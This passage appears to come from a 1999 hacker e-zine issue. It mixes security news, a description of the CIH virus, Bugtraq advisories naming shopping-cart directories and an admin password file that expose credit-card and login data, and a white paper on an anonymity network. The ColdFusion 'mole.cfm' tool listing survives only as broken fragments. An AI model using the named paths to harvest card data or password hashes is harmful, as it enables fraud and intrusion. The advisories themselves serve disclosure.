(07). The stupidity that lies in credit fraud - [KKR] (08). Screwing around with /dev/audio - [ph1x] (09). My day in age(Firewall, a magic bullet?) - [rhinestone] (10). d0x (For your harrassing enjoyment) - [pG] (11). Coding a shell from the ground up - [ph1x] (12). The art of writing shell code - [smiler] (13). The telephone system/network part 1 - [pabell] (14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler] (15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x] (16). IRC lawgz, cybersex erotica - [b4b0] (17). Revolution against the catholic church - [schemerz] (18). bsaver.c overview - [cp4kt] (19). Conclusion - [ph1x] + juarez ;) Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ More great poetry from Liquid Phire!; From: "liquid phire" To: cruciphux@dok.org Cc: Uzi@Rave-Generation.dnx.co.uk Subject: greatness Date: Mon, 26 Apr 1999 23:08:26 PDT Mime-Version: 1.0 Content-type: text/plain ***another? yes *sigh* oh but i must. sanity is only as close as a pen.*** "to be great is to be misunderstood" we are to be remembered as names, not faces. we are to be remembered as notions of truth, not as images flashed on the evening news. the cost of infamy and fame are more then those who possess might care to admit. it is better to be great without being misunderstood, to change the world without attracting undesired attentions. the time for lies has passed, this is a dangerous spell and we can leave no option of damnation open. the future of the internet will be determined by the actions of those on it now, advocates of censorship have found new hope due to recent untimely events. sinners tricked as saints are controling the country as we now walk on thin ice. safe are we within our bunkers of pretenses until the ebon shadow of reckoning nears, when the end comes we need more to hold close to our translucent hearts then the newspaper clippings and the vauge texts that are our legacy. the media has gotten the best of this religion, and our minds have gotten the best of our hearts. as but comic book superheros that have flown to close to the sun our luck will not last and the curtins will one day part to reveal a few disillusioned clutching close their tattered capes. already some have sold out, a mistake that can be easily made but should be avoided to protect the integrity of what we should represent. hope for understanding is not one of the desires that lies in mens' hearts, no war cry has ever been for peace. the walls of the fortress need to be smooth with no cracks and fissures to provide the weaknesses needed for foes. the masses, like fire, can be used for both good and evil, it is those that tame them that save, or damn, the world. phiregod liquidphire@hotmail.com please excuse all errors i welcome all comments and constructive criticism at the above address _______________________________________________________________ Get Free Email and Do More On The Web. Visit http://www.msn.com -=- ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *No comment, its issue 16 already, just read it.... ;-) this issue is dedicated to *#99 and the folks in Denver... so sad we have to have copycats isn't it? * * * * - Ed * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Telecardnews site, phone card and smartcard cracking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://members.tripod.com/telecardnews/index.html I stumbled across this site during web searches, it has some interesting info on telephone card and smart card hacking and news about recent goings on in that world.. here's a sampling of what they have online. TELEPIRATES BUSTED ! Reports are reaching us, as yet unconfirmed, that the notorious Telepirates have been raided. "Heavies" allegedly in the pay of Telecom Companies and Telecard Manufacturers are believed to have carried out vicious attacks on the Telepirates main premises in Holland, Spain and USA. It is well known that they had trusted agents world-wide who may or may not have been effected by these raids and we await confirmation of this report. It can be confirmed that their main order page on the net has been removed . This action may have been performed by themselves or by the Law Enforcement Agencies possibly involved. It has been known for some time, that Gemplus (a major smartcard producer) was thoroughly investigating telecard piracy and those connected with it. Nobody was more connected than the Telepirates who flaunted their expertise across the whole world wide web. In view of this development, and a tip off from a known Telepirate member. We recommend to our readers (perish the thought that they would consider anything remotely criminal) that they should not under any circumstances send payments to the Telepirates, until further notice as this will probably end up sequestrated or in the hands of the Authorities. It is also likely that Bank Accounts have been compromised and possibly frozen. Keep watching, we will keep you updated. If you have any information regarding this breaking story, contact us immediately in confidence. We will not divulge the source. send info TELCOS INVOLVED IN BUST April 13th 1999 TELECARD SECURITY NEWS: This is the latest news on this story. Our investigations confirm that major smartcard companies and telcos were at least aware of the Telepirates bust. One international smartcard manufacturer gave the following statement: "We will neither confirm or deny any involvement concerning this criminal group. Anyone who attempts to penetrate systems by illegal means, including the perpetrators and their supposed clients are all law breakers and should be dealt with only by the appropriate authorities". We did contact representatives of other Telcos and smartcard manufacturers and they all declined to comment on or off the record. In our enquiries to these companies, we referred to the Telepirates only as "phonecard hackers who where raided recently", yet two of these companies mentioned the "Telepirates" by name. This was a touch suspicious and despite our insistance that they answer our questions, the stock answer was "No Comment"! Final Note: Our readers are reminded that THE TELECARD SECURITY NEWS cannot condone or support any kind of illegal and criminal activities. We do strongly support and encourage dissemination of information for security reasons and lessons can be learned by all concerned.... Next update. Hopefully we will have more information from Telepirate spokesman "Frazzle". Watch out for more of our news updates and if you have any information which we can confirm. Please contact us: http://members.tripod.com/telecardnews/email.htm @HWA 04.0 Coldfusion mole.cfm ~~~~~~~~~~~~~~~~~~~ This didn't make it into last weeks issue, here it is now, its the program that can be used to up and download files to a coldfusion server. From HNN http://www.hackernews.com/ File uploaded

File deleted

#DirPath#
Name Size Modified date
[#Type#] #Name# #Size# #DateLastModified#

for more info on the ColdFusion hole and how to protect yourself or see if your server is vulnerable check http://www.403-security.org/Htmls/news.htm and follow the bugtraq link. @HWA 05.0 More info on the CIH virus ~~~~~~~~~~~~~~~~~~~~~~~~~~ April 26th from www.403-security.org CIH virus infects Windows 95 and 98 EXE files. After an infected EXE is executed, the virus will stay in memory and will infect other programs as they are accessed. The CIH virus was first located in Taiwan in early June. After that, it has been confirmed to be in the wild in at least France, Germany, The Netherlands, Sweden, China, Israel, Chile and Australia. CIH has been spreading very quickly as it has been distributed through pirated software. It seems that at least four underground pirate software groups got infected with the CIH virus, and they inadvertently spread the virus globally in new pirated softwares they released through their own channels. These releases include some new games which will spread world-wide very quickly. There's also a persistent rumor about a 'PWA-cracked copy' of Windows 98 which would be infected by the CIH virus but Data Fellows has been unable to confirm this. Later on, CIH was available by accident from several commercial websites, including the Origin Systems website where a download related to the popular Wing Commander game was infected. What makes the CIH case really serious is that the virus activates destructively. When it happens the virus overwrites most of the data on the computers hard drive. This can be recovered with recent backups. However, the virus has another, unique activation routine: It will try to overwrite the Flash BIOS chip of the machine. If this succeeds, the machine will be unable to boot at all unless the chip is reprogammed. The Flash routine will work on many types of Pentium machines - for example, on machines based on the Intel 430TX chipset. On most machines, the Flash BIOS can be protected with a jumper. By default, protection is usually off. The CIH virus infects Windows executable files (EXE files). It does not infect Word or Excel documents. CIH works under both Windows 95 and Windows 98, but it does not work under Windows NT. CIH uses a peculiar way of infecting executables. As a result, the size of the infected files does not grow at all. The actual size of the virus code is around 1 kB. The virus also employees advanced tricks in jumping from processor ring 3 to ring 0 in order to hook file system calls. There are four known closely-related variants: CIH v1.2 (CIH.1003): Activates on April 26th. This is the most common variant. It contains this text: CIH v1.2 TTIT CIH v1.3 (CIH.1010.A and CIH.1010.B): Activates on June 26th. Contains this text: CIH v1.3 TTIT CIH v1.4 (CIH.1019): Activates on 26th of every month. It is in the wild, but not particularily common. It contains this text: CIH v1.4 TATUNG Note on disinfection: If you're using F-Secure Anti-Virus for Windows 95 v4.02, you need to exit Windows to disinfect CIH. Choose Start/Restart in MS-DOS mode, then execute FSAV for DOS from the FSAV CD-ROM and disinfect your hard drive with that. By Astral @HWA 06.0 E-commerce takes it in the gnards, more compromised carts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 27 Apr 1999 14:39:47 +0200 From: Bo Elkjaer To: BUGTRAQ@netspace.org Subject: Re: Shopping Carts exposing CC data Been doing some more searches for misconfigured webcarts exposing cc-information. Seems like a pandora's box, that just opened. Perlshop is vulnerable too if misconfigured: Version? Platforms? Executable file: perlshop.cgi Exposed directory: /store/customers/, /store/temp_customers/ Exposed orderinfo: Several files, eight-digit numbered names. Status: adverware. Only requirement is to display a "powered by perlshop"-logo on page. Bo Elkjaer, Denmark -=- (hhp) SMPS advisory. (hhp) ---------------------------------------------- SMPS (Server merchant payment system) has default permission problems. The wrong moded directory is Cybercashserver/smps* which gives complete access to view all the config and database files. The most dangerous file that is left world readable is: Cybercashserver/smps*.../merchants/admin.pw or maybe another various directory path/location depending on the server and version of the software. The admin.pw contains a crypt(3) passwd. This could lead to a system-wide compromise if it was to be cracked. The official website for this software that was found in the README file currently doesnt allow access to view the website which made it hard for me to build more information about this software. My suggestions to admins using this software is to disable this software, change the modes on the directory and get in contact with the vendor of this software and find out when they plan to release a new version of this software fixing this defualt problem. If you want to play it safe, I would check your server to see if you have already been cracked and hacked. I have notified the vendors of this software about the problem and hope the best to all the clients. -elaich 4-29-99 10:35:53pm CST ----------------------------------------- elaich of the hhp. hhp-1999(c) Email: hhp@hemp.net Web: http://hhp.hemp.net/ Voice: 1-800-Rag-on-gH pin: The-hhp-crew hhp-ms: hhp.hemp.net, port:7777, pass:hhp ----------------------------------------- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.0 for non-commercial use mQGiBDcl8CwRBAD7xCp+A5ORiRzMLS4mPstL1aJadSCXSGyNKEZZ6kZwdO3YhLCf 2vkeJF0OGe8KRfd8LRxP0f/3syg7lfH77m0OP8NXeoOHD48T8K4Mabp2WEJmUW0r J6op94LjFUwqNqYuOa+bVULrotZY6iWlxBWunltu9wrqgP22RVtKAu0PVwCg/2SS rYoDCNTH4dlzNcVcza5XuhMEALbmuKISbjeOqsVETYYMdQfr0M/m1YfztjJ2tDS7 bGfOCFpQUFLyCUt/FHHmlInXQWUSVCgjkp0/giFoY9dX+4IB8wLgfu68BOZM5fft I5mxI0vyBSke2kHQTqf3vQ5Yveg6gIB8WW9Pi+MAwLMS3+Hmrar+4GCUOqe9w3yi u1q3BADcAM3VkORpkifjK8pWex1fdfvGmLBX5PBuCexl5dpeXdVC+Ktncis9u4yh 5f/PI/g/Uk4T2D/nF5PA4tSkNvRJaPVZCXjFRfc4K+rzQxuYRePwXFgaHSk9cDnd XBq5JM6iXLBGFIJpbbwWkftuFOaJLXdP/DqDaXkjbWXLbH9nN7QhZWxhaWNoIG9m IGhocC4gPGhocEBoaHAuaGVtcC5uZXQ+iQBLBBARAgALBQI3JfAsBAsDAgEACgkQ bSmqkM1thIxvkQCeIEUYJTwF5nC+T9DUcUqStqpwtiQAoIzw9fqSB026Q+w0CGWe BPX9LD5ruQINBDcl8DMQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoB p1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnh V5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr 5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4 XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zaf q9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/oCoABrcAodA+Qw 0QOzptm6arxtaRte4a6ZQs+N4Y63+S5oKBz4/atHGGIqgcxCUaaPCxfcqRMoz6Tw ZhxOKe3/xKA+qPRfLP19P3nHcTLZqa/orvohDu235OQHBd5Mi6sr2MUcUL1WfsU7 fPZEjwu6d3MuXpjJUeFzNezJzIbXNzqFAVQawVH6lV+xGfqjD0zceGFGALvvGVxL ANdmCzqjE1LFbqf1Zdd04lKYKSglX4PFz3Ly/jzi22GFxMuGf6ud4R80wUC0zBKO RZHX3jPqjrqfbY9dq1vpBNDEugOYPqv3/lNlkoxUzKhJCZLPUcbQQs+BuNUUcRW9 dEkl71kuiQBGBBgRAgAGBQI3JfAzAAoJEG0pqpDNbYSMFgIAoMUE0SGIfqg0oj9e oY9AHDAScmZtAKDgKF7STtRwB4KJ6/Q9HC3gUgGBbA== =GJ0e -----END PGP PUBLIC KEY BLOCK----- 06.1 E-commerce boom fueling Security Holes? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.thestandard.net/articles/display/0,1449,4307,00.html?home.tf E-commerce Boom Fueling Security Holes? By Jack McCarthy and Elinor Mills Recent breaches of customer privacy by online stores shows that early concerns for Internet security were justified, industry experts said, adding that smaller businesses rushing to get online are often the culprits. Just this week, an employee at an Internet service provider in Bellevue, Washington, posted a warning on the Internet to systems administrators and Web developers about the potential for Web sites exposing information as a result of misconfigured e-commerce software. Joe Harris, systems administrator for Blarg Online Services which hosts e-commerce sites for companies, said Thursday that he discovered last week that more than 100 online stores hosted by Blarg were inadvertently revealing customer names, addresses, credit card numbers and other purchasing information. One of the ways random Internet users could access the information was by using certain keywords while doing searches on the sites, he said. Since he posted the warning, many of the affected Web sites have corrected the problem, Harris said, but at least two stores were still exposing customer information on their sites Thursday. Such privacy breaches are expected to increase as more retailers go online. "With the growth of the Internet and the use of e-commerce, you're going to get more and more of these situations," said Bob Lewin, executive director of TRUSTe, a Cupertino, Calif.-based group that monitors online privacy practices and offers seals of approval to Web sites that agree to follow basic privacy guidelines. Experts say the privacy breaches seem to be happening primarily with smaller companies that might not have the expertise and sophistication to properly install electronic commerce software or the money to hire experienced firms to do it for them. "It's definitely an issue that impacts smaller online merchants that are either using multiple site hosting services or are building their own using these simpler [turnkey] commerce packages," said David Kerley at Jupiter Communications market research firm in New York. "It's an area that larger online merchants are more sensitive to and more knowledgeable about." Along with the dramatic growth of e-commerce, smaller companies are racing to sell online and creating greater demand than can be met for people who know how to create secure Web sites, according to Kerley, "so people who aren't as experienced are getting into the business." Amateur Web designers can fail to follow instructions in using shopping-cart software that takes orders from customers, Harris said. When the software is improperly installed, the information can be exposed, for instance by being stored on a file that is accessible to web surfers, he said. Many small retailers use friends or untested companies to develop their Web sites, Harris said. "They hear that their sister-in-law's cousin can do it, so they hire him," he said. Basically, companies should be careful in selecting firms to set up and host their e-commerce sites by getting references, using established firms and asking about privacy and security upfront, the experts said. If they don't they'll not only lose customers but growth of e-commerce in general will be impeded, Lewin of TRUSTe said. "If you are going to put your store on the Web, you are responsible for the information that's there," Harris said. "Your client is trusting you to make sure you do everything in your power to make sure that data is safe." While smaller companies may be primarily at fault for privacy breaches lately, data exposures at Web sites run by larger companies also can happen and when they do they can pose an even greater risk, according to Ari Schwartz, policy analyst at the Center for Democracy and Technology in Washington, D.C. "Smaller companies do cut corners, but the larger companies usually have large databases and there's a lot more at stake, he said. "So both [types of companies] need to pay adequate attention, especially those people implementing software solutions for large numbers of small companies." At the same time, companies are becoming more aware of the necessity for security. Nearly 700 Web sites are members of Truste and more are joining all the time, Lewin said. "The majority of our licensees are smaller organizations," he said. They "don't have time to do the necessary investigations to find out what they should be doing in the first place." On their end, consumers should try to find out how secure the sites they buy things from are. "It's no different than other markets. Buyer beware," said Kerley of Jupiter. There also need to be technical solutions that make it easier for people to read privacy notices online so they can determine whether the Web site is as secure as they want it to be, said Schwartz of the CDT. "Seems as though it takes a violation of peoples' privacy to make people pay attention," Schwartz added. The federal government may eventually give online merchants a push in the direction of guaranteeing security. Although the Clinton administration favors allowing the industry to regulate itself, agencies such as the Department of Commerce and the Federal Trade Commission have been discussing how to encourage privacy protection and lawmakers have talked about enacting laws that would make Web sites liable for privacy breaches on their sites. Despite the privacy lapses that are occurring in the retailer rush to sell online, the risk is still minimal to most consumers, according to Kerley at Jupiter. "There's not a huge risk for the consumer except to maybe have to cancel a credit card," he said. "There are far more shady businesses that are not on the Internet that have access and do access personal information of a more sensitive nature. All it takes is a few dollars to get a credit rating and credit report," for example, Kerley said. Jack McCarthy and Elinor Mills write for the IDG News Service. @HWA 07.0 Anonymity guaranteed (PCworld) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.pcworld.com/pcwtoday/article/0,1510,10700,00.html Anonymity Guaranteed on the Net For $9.95 per year, ISPs will erase all trace of your Web travels. by David Needle, special to PC World April 26, 1999, 9:48 a.m. PT Superman had a secret identity, and soon you may too, thanks to Zero Knowledge Systems, an Internet security company that wants to give Web surfers total online privacy. ZKS has created the Freedom Network, a band of 50 Internet service providers that route encrypted data through what the company says is an untraceable path. Any data that represents your presence on the Internet is encrypted and bounced around servers in the Freedom Network so there is no digital trail of who you are or where you've been. For the time being, participation in the Freedom Network is free while participating ISPs finish testing their software. A full-fledged Windows-based client is due out later this summer for $49.95, complete with five secret identities, aka "nyms," or pseudonyms. A 45-day free trial version will also be available. After the first year, the cost is $9.95 per year, per nym. "We're giving Internet users total privacy, which they've never had before," says Austin Hill, president of Zero Knowledge Systems. "We don't even ask you to trust us because even we don't know where you are browsing." You don't even have to belong to a Freedom Network ISP to join, though Hill says there may be some performance advantage if you do. ISPs in the Freedom Network tend to be small to midrange players, with larger Web providers taking a wait and see approach."Later on we'll want to bring some of the larger ISPs on board," says Hill. The Downsides of Privacy "The privacy feature can't degrade the user experience it has to be invisible," says Jim Balderston, Director of Zona Research. "And if you are promising 100 percent privacy protection, you have to deliver because consumers aren't going to accept anything less." Some people worry that greater Internet anonymity means more scam artists and criminal activity. For example, an anonymous Web surfer might have an easier time harassing people online. However, ZKS attempts to limit online harassment by honoring requests not to receive e-mail from nyms. And harassment should be somewhat limited because it costs money to establish a pseudonym, according to Hill. "Like all freedom, this can be abused or used for good," says Hill. But, he adds, "we don't outlaw cars because people sometime have accidents in them." Worth the Price? Still, are privacy guarantees worth even a small price to your average, law-abiding Web user already paying $20 or more per month to get online? For a lot of people, yes. Parents, for example, might join the Freedom Network so that their children can participate in online chat rooms without divulging their identity. "The issue of privacy is a substantial one," says Zona's Balderston. "People don't realize how much information has already been gathered about them. When you start seeing pop-up screens that say 'You bought boots at such-and-such a Web site, now check out our camping gear,' that will be distressing to a lot of people; they're going to look for some way to have anonymity online." ISPs also benefit from joining the Freedom Network,Hill says, because it limits their legal liabilities. "We've seen cases where users get into a flame war that ends up in a civil suit and the ISP gets dragged in," says Hill. "It's a lot easier to be able to say, 'I don't have any data on this.' It's an encrypted stream of traffic." "Our customers are deeply concerned about online privacy," says Paul Engels, vice president of I.D. Internet Direct, Canada's second largest ISP and a member of the Freedom Network. Engels calls the ZKS network "the most comprehensive and credible effort to put privacy back where it belongs--in our customers hands." @HWA 07.1 Anonymity guaranteed? ~~~~~~~~~~~~~~~~~~~~~ FreedomTM is easy-to-use software designed to give you total privacy while on the Internet. This driver-level software runs in conjunction with all your current Internet software, ensuring your privacy in a totally transparent, unobtrusive way. Freedom uses high-grade public key cryptography to encrypt the contents of any Internet transmission, including e-mail, chat room, web browsing and newsgroups. It also protects the source and destination of all Internet traffic. Freedom simultaneously manages all of your digital identities, watches all outbound traffic for personal information and automatically encrypts and routes traffic through the Freedom network, transparently decrypts all incoming traffic, places cookies into Cookie JarsTM, filters spam. Customized pseudonyms to manage your identities Freedom allows you to create one or several digital pseudonyms. A digital pseudonym lets you create a unique online identity for yourself (which may or may not be like your true self) that you can use to perform all your Internet-related tasks. You are the sole owner of the pseudonyms, which can be configured to have different e-mail addresses, geographic locations and encryption keys. Different pseudonyms give you the opportunity to separately explore completely different areas of the Internet and avoid being profiled by Internet marketers. Who do you want to be today? You choose how to use your online identities. For example, if you like to debate politics online you can designate one pseudonym as your "politics" pseudonym. Use it when you post in political newsgroups, surf activist web sites, e-mail your political contacts and chat in political chat rooms. No one can trace it back to your real self. Any concern you have about people monitoring you or collecting your personal information on the Internet is gone. Your boss will not be able to find out what you like to chat about on your own time. Marketers cannot generate a profile of you and put you onto mailing lists without your consent. No one--not even Zero-Knowledge Systems--will be able to find out who is behind a digital identity. Full strength encryption and Cookie JarsTM Each digital identity uses full strength encryption that ranges from 128-4096 bits. This transparent encryption permits all outgoing Internet packets, e-mail and newsgroup postings to be encrypted, and where appropriate, digitally signed by the pseudonym's public key. Every Freedom user is connected to a Freedom server that anonymizes source information to protect your identity. When sending e-mail both the sender and recipient's addresses are encrypted, as well as the message itself. Many web site place cookies (little bits of information) on your computer to record and customize your visit. To prevent cookies from revealing or correlating any of your identities, Freedom has a cookie management system called Cookie Jars. Each digital identity has its own Cookie Jar, and any cookie received by that identity is collected in its individual jar. This way, your digital identities remain completely separate from each other and from your real self. Advanced spam control Freedom also has advanced spam filtering tools so you can filter out unwanted, unsolicited e-mail sent to your pseudonyms. When enabled, Freedom's anti-spam functions eliminate 100% of unwanted bulk email before it even gets to your mailbox. For a complete list of Freedom's features and technical details, see the white paper. 07.2 ZKS White paper ~~~~~~~~~~~~~~~ For diagrams (there are only two) view in html mode or visit this url http://www.zeroknowledge.com/products/Freedom_Architecture.html The Freedom Network Architecture (Version 1.0) Zero-Knowledge Systems, Inc. This document describes the architectural components of the Freedom network. This document is intended for system administrators and potential Freedom Server operators. A solid understanding of networking terminology and acronyms, such as SMTP, POP3, HTTP, TCP/IP, etc. is assumed. Familiarity with previously deployed building blocks of Internet privacy systems, such as nymservers and remailers, is desirable. If you are unfamiliar with any of the above, please consult the sources listed in the bibliography at the end of this document. Client-server Architecture The Freedom product is composed of two primary elements: the client application and the server network. Any Internet user wishing to protect their privacy needs the Freedom client application installed on their computer. The client application is compatible with current Internet protocols and works transparently. The server network is known as the Freedom network. The Freedom network is made up of numerous Internet servers running the Freedom server-side application. The Freedom network provides a mechanism to ensure anonymous connections between user and destination. Freedom Network Components Freedom Server Nodes The Freedom Server Nodes are at the core of the Freedom network. Freedom Server Nodes have been deployed by ISP's, individuals, and organizations worldwide. The nodes are owned and operated by Freedom partners independently of Zero Knowledge Systems. This assures that the user's privacy will be protected even if Zero Knowledge Systems itself was subject to compromise. Each Freedom Server Node is comprised of four logical sub-systems. The subsystems are: Anonymous Internet Proxy (AIP), Anonymous Mail Proxy (AMP), Wormhole, and Traffic Shaper. Anonymous Internet Proxy (AIP) The AIP provides the underlying anonymous TCP/IP connections. While current Freedom clients support only TCP-based protocols (with the exception of DNS), the AIP itself operates at the IP level, thus allowing maximum flexibility for future feature enhancements and support for non-TCP based protocols. Each AIP performs the following actions upon startup. Initialization On start-up, the AIP loads its key cache stored on the local disk, and examines it to see which keys have expired. Each AIP has a list of five topologically neighboring AIPs stored on the local machine. (During the beta test, this list of neighboring AIPs is manually entered to the Freedom Server Node). A query is then sent to the Network Information Database (NIDB) server to retrieve a list of encryption keys for the other AIPs in the cloud that may have expired prior to initialization. This query, as all communication between components in the cloud, is performed using an Anonymous TCP (ATCP) connection. Establishing Routes to Neighbors Reading the list of neighbors, the AIP sends "PADDING" packets through UDP to the neighbors. These packets have the same size as payload packets to provide "for free" cover traffic. The use of PADDING packets and cover traffic introduces the notion of a Heartbeat amongst the AIPs. A heartbeat is defined as the time delay at which a packet must leave the machine for a specific neighbor, hiding any information of the AIP server's status (idle or busy). The heartbeat concept prevents traffic analysis to a significant degree. Since packets are sent out on a regular basis, and knowing the rate at which these heartbeat packets arrive at a machine, an AIP can determine if a neighbor is unreachable since it will fail to send an ALIVE packet after a certain amount of time. PADDING packets further prevent traffic analysis by maintaining a constant data flow between the AIPs. In addition, all data is link encrypted between two adjacent routers with a shared session key. Payload Route Creation The originator of a connection chooses a route to follow through the anonymous cloud. The route consists of a user-definable number of AIP jumps within a system-wide minimum and maximum of jumps. By imposing a minimum number of jumps, the anonymity of the transaction is guaranteed. The maximum number of jumps is imposed to establish a maximum packet size. The default number of jumps is three The route is created with information that includes Anonymous Connection IDs (ACIs), the next AIP hop for the current route, client/AIP symmetric keys, cryptographic algorithms, and expiry time of the route. The originator of an anonymous connection has an initial cache of routes to travel through the cloud. This cache is validated and an initial Anonymous TCP (ATCP) connection is made with an AIP. This selection is a general case of route selection (using a limited subset of AIPs). Next, the client requests a set of routes and signing keys from the AIP it is connected to. The AIP then sends the routes and signing keys to the client. Once verified, the local routing table is updated. This ensures that as little correlation as possible can be made between the request for the initial set of routes and the creation of a digital identity (and corresponding route). Requesting these routes from a single source would enable easy monitoring of such requests. Using the cloud as the source of routes hides this action from observers. Once the client receives a topological map and a link state table, it can proceed to compute a path from an input to an exit AIP. Users may choose to activate Freedom's Automatic Route Selection feature, which adheres to the following specification: For performance reasons, select an entrance AIP "close" to the client, where close is defined as being topologically close. This could potentially reveal some information, but it is felt that the increased performance is worth the risk of exposure. Subsequently, the following AIP is selected at random, and may include any available AIP, excluding any previously visited AIPs. This step is repeated until the final hop is selected. At route creation time, the first packet uses a public key algorithm to create a session key. The session key is used to encrypt all other packets sent between AIPs for that specific Anonymous Connection ID (ACI). The payload of the anonymous packet should, at all times, be encrypted when it travels through the anonymous cloud. The only time the payload may be "in the clear" (i.e.: the session key is decrypted) is once the data exits the anonymous cloud at a Wormhole. To prevent traffic analysis, the lengths of the packets, are independent of the amount of data inside the packets; padding is added within each packet to ensure this. Route creation packets are protected against traffic analysis by employing a second size PADDING packet In order to jump from one AIP to another, the following process occurs: 1.Decrypt link encryption on the header. If the packet contains a CREATE command in the header, the decryption will occur using the AIPs private key. For all subsequent traffic, a symmetric key is used for link decryption. 2.Process header information. The AIP responds to various header commands that include CREATE (open a path) and DESTROY (close a path). This header information is different from the header of the packet that is being sent from the client. The header the AIP reads contains added information, such as the nature of the packet, the size of the message packet, and the amount of padding. In the case of a packet with a CREATE header, the information decrypted from the header would include the following elements: Forward cryptographic algorithm. Backward cryptographic algorithm. The IP address and port number of the next hop. Expiry time of the route. A selected number of bits of key seed material to get a symmetric key for the rest of the data. 1.Decrypt/encrypt the rest of the packet information. This is done using the key seed material found from within the CREATE packet header that was decrypted upon arrival at the AIP. This is used for the forward and backward decryption keys. 2.Take the appropriate action. This includes table update and lookup actions. For example, a table lookup is performed to confirm if the ACI is currently valid; the encryption key and algorithm are retrieved from the table and applied to the payload (encryption or decryption based on the ACI). A new header is created with the corresponding ACI. The header is encrypted using the link encryption key and the packet is sent to the next host in the chain. 3.Create new header. A new ACI is selected and the packet is then padded to maintain the packet's size. 4.Encrypt the header with the link encryption key for the next host. The packet is encrypted using the link encryption key of the next AIP in the route. 5.Send the new packet to the next hop in the chain. The packet is released from the AIP and sent to the next one specified in the route. 6.Deliver Data to destination. When the number of jumps has met the number specified by the client, the packet is sent to the Wormhole by the final AIP in the route. Anonymous Mail Proxy (AMP) The Anonymous Mail Proxy (AMP) provides for both outgoing and incoming mail delivery services. It accepts email from digital identities and processes the mail by holding it for a random amount of time and reordering all messages being held at this AMP. After the "holding" time expires, the message is sent from one AMP to another, preserving the anonymous connection. This is done using the Anonymous Mail Transfer Protocol (AMTP). The packet format of an AMTP packet has three parts: Send or Reply Blocks AMTP to SMTP headers which can change in transit Message body This information jumps from one AMP to another with varying levels of details and instructions, depending on which stage of the transfer is occurring. Before any mail transfer occurs using a digital identity, a public key is created for each identity. The Freedom client then creates up to three reply blocks for each identity. The reply blocks outline the route that mail packets will follow through the cloud (i.e.: instructions for each AMP, so they know where the packet should be sent after it has been reordered and held in its queue). Each reply block consists of encryption keys and addresses for three selected AMPs in a specific route. The redundancy of three reply blocks is required in case one of the AMPs (used in one of the reply blocks) is inoperable. The reply blocks are encrypted with the nymserver's public key and are sent to reside there. Future versions of Freedom will implement more advanced methods of anonymous mail transport without the need for reply blocks. Layered encryption is used because the user's real email address resides within the reply block of the digital identity. In a case where a digital identity receives email, the user's real address should be kept secure until it reaches the last AMP in the return chain (which sends the message to the user's address). Although the final AMP knows the user's real email address, it must not know the content of the message, the pseudonym under which it was originally addressed, or the origin of the message. Using layered encryption, and a lookup table within the nymserver, confidentiality can be achieved through the reply blocks. Incoming Email Once incoming mail arrives for a digital identity, the nymserver looks up the identity's reply block. Each dimension of the reply block consists of three articles: The next destination in the chain (AMP or real email address) A symmetric key The remaining content of the layered reply block. The nymserver decrypts the reply block with its private key, and reads the next destination AMP, a symmetric key, and the remainder of the layered reply block. The nymserver uses the symmetric key to encrypt the mail message, then the message and the reply block are sent to the next AMP. This AMP receives the message and the reply block, decrypts its layer of the reply block to reveal the next destination, and another symmetric key. This new symmetric key is used to encrypt the mail message, and the remainder of the reply block and the mail message are sent to the next destination. The third AMP receives the message and the reply block. The AMP decrypts the reply block and discovers a destination and a key. The AMP encrypts the message with the symmetric key. The destination this time, however, is not a AMP, but the user's real email address. Note that, at this point, the AMP does not know where the original message came from, nor its content because it is multiply encrypted, and the pseudonym is no longer present because the header of the message itself is encrypted and the reply block is entirely de-layered. The message is sent to the user at the user's email address. Considering the conditions from the previous Web browsing example, with 3 AMPs denoted A, B, and C, and the real user real@address.ca and the pseudonym mynym@freedom.net, we get the following: 1.Mail (denoted M) arrives to the Freedom nymserver addressed for mynym@freedom.net. The reply block for mynym (denoted BC) is found within a table. The nymserver can be considered as being AMP-C. 2.The reply block is decrypted using the nymserver's private key. 3.AMP-C finds itself in possession of the details for the next destination (AMP-C), and a symmetric key, denoted KC. AMP-C encrypts the message with KC (i.e., EKC(M)), and sends what remains of the reply block, being BB to AMP-B. 4.AMP-B receives the message and the block. AMP-B decrypts the block and finds the next destination details (AMP-A) and a symmetric key, denoted KB. AMP-C performs EKB(EKC(M)) and sends the message and the remainder of the block, being BA to AMP-A. 5.AMP-A receives the message and the block. AMP-A decrypts the block and finds real@address.ca and a symmetric key, denoted KA; the block is now empty. AMP-A performs EKA(EKB(EKC(M))) and sends the message to real@address.ca . 6.The user (real@address.ca) receives the message, and performs the necessary decryption and finds itself in possession of the original message M. Through this process, the digital identity's integrity remains intact, the AMPs in the route are not aware of the message's content, and the mail is received. Outgoing Email Using Anonymous Mail Transport Protocol (AMTP), the Freedom client software deposits outgoing mail into a reordering pool at the Freedom Mail Gateway. 